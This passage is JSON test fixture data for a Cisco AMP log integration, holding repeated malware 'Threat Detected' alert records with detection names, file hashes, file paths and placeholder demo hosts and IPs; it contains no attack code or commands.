"e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 152159, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259080131182683", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 996000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259080131183000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 187917, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6159251507855228943", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 944000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251507855229000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 189236, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251503560261640", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 821000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251503560262000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 198516, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259028591575130", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 984000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259028591575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 207155, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:21.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251439135752194", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 455000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251439135752000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 208474, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:14.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258981346934873", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 346000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258981346935000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 210041, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:02.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258929807327320", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 334000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258929807327000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 211360, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668623368585250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 753000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668623368585000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 212679, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258878267719767", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258878267720000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 216643, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258826728112214", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 310000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258826728112000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 217962, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:26.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251202912550913", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 262000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251202912551000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 219281, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:10.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258706469027925", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 292000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258706469028000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 220867, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258680699224148", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 286000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258680699224000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 222186, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668365670547487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 428000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668365670547000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 223505, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668361375580188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 616000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668361375580000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 227473, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": 